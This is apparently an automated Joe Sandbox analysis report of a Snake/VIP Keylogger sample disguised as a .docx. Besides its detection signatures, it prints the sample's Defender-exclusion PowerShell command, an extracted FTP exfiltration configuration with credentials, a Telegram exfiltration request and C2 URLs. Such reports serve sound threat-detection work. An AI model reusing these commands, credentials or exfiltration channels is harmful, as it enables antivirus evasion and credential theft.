Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Overview

General Information

Sample name:HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Analysis ID:1576530
MD5:bf49fb7c260b15a61c5849a49fdee343
SHA1:059f7b0a2d5f6b18a06f9ccd2995a7ecb9d69b14
SHA256:4733c3841f338c4b95b5226678de7358eaf8604750ee3aa3c3d55ce829db11b3
Tags:exeSnakeKeyloggeruser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe (PID: 1376 cmdline: "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe" MD5: BF49FB7C260B15A61C5849A49FDEE343)
    • powershell.exe (PID: 4908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "FTP", "Username": "belogswork@inhanoi.net.vn", "Password": "usarmy11111@@", "FTP Server": "ftp://ftp.inhanoi.net.vn/", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d91c:$a1: get_encryptedPassword
          • 0x2dc21:$a2: get_encryptedUsername
          • 0x2d728:$a3: get_timePasswordChanged
          • 0x2d823:$a4: get_passwordField
          • 0x2d932:$a5: set_encryptedPassword
          • 0x2efbf:$a7: get_logins
          • 0x2ef22:$a10: KeyLoggerEventArgs
          • 0x2eb87:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 13 entries
          SourceRuleDescriptionAuthorStrings
          0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bd1c:$a1: get_encryptedPassword
                • 0x2c021:$a2: get_encryptedUsername
                • 0x2bb28:$a3: get_timePasswordChanged
                • 0x2bc23:$a4: get_passwordField
                • 0x2bd32:$a5: set_encryptedPassword
                • 0x2d3bf:$a7: get_logins
                • 0x2d322:$a10: KeyLoggerEventArgs
                • 0x2cf87:$a11: KeyLoggerEventArgsEventHandler
                0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x39bad:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x39250:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x394ad:$a4: \Orbitum\User Data\Default\Login Data
                • 0x39e8c:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 27 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", ParentImage: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, ParentProcessId: 1376, ParentProcessName: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", ProcessId: 4908, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", ParentImage: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, ParentProcessId: 1376, ParentProcessName: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", ProcessId: 4908, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", ParentImage: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, ParentProcessId: 1376, ParentProcessName: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", ProcessId: 4908, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:33:17.134618+010028033053Unknown Traffic192.168.2.449736104.21.67.152443TCP
                2024-12-17T08:33:20.067027+010028033053Unknown Traffic192.168.2.449739104.21.67.152443TCP
                2024-12-17T08:33:23.020648+010028033053Unknown Traffic192.168.2.449741104.21.67.152443TCP
                2024-12-17T08:33:26.024751+010028033053Unknown Traffic192.168.2.449744104.21.67.152443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:33:12.799786+010028032742Potentially Bad Traffic192.168.2.449733193.122.130.080TCP
                2024-12-17T08:33:15.515581+010028032742Potentially Bad Traffic192.168.2.449733193.122.130.080TCP
                2024-12-17T08:33:18.421884+010028032742Potentially Bad Traffic192.168.2.449738193.122.130.080TCP
                2024-12-17T08:33:21.343965+010028032742Potentially Bad Traffic192.168.2.449740193.122.130.080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeAvira: detected
                Source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "belogswork@inhanoi.net.vn", "Password": "usarmy11111@@", "FTP Server": "ftp://ftp.inhanoi.net.vn/", "Version": "4.4"}
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeVirustotal: Detection: 30%Perma Link
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeReversingLabs: Detection: 28%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49734 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: Iecr.pdb source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: Binary string: Iecr.pdbSHA256 source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 4x nop then jmp 06F85678h3_2_06F85260
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 4x nop then jmp 06F850B1h3_2_06F84E00
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 4x nop then jmp 06F831A5h3_2_06F82FC8
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 4x nop then jmp 06F83B2Fh3_2_06F82FC8
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06F824C8
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 4x nop then jmp 06F85678h3_2_06F855A6
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 4x nop then jmp 06F8F829h3_2_06F8F580
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 4x nop then jmp 06F85678h3_2_06F8525A
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 4x nop then jmp 06F8F3D1h3_2_06F8F128
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06F82CEB
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06F82B0B
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 4x nop then jmp 06F8FC81h3_2_06F8F9D8

                Networking

                barindex
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2018/12/2024%20/%2006:26:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
                Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 104.21.67.152:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 104.21.67.152:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 104.21.67.152:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 104.21.67.152:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49734 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2018/12/2024%20/%2006:26:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 17 Dec 2024 07:33:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1729417735.0000000002971000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
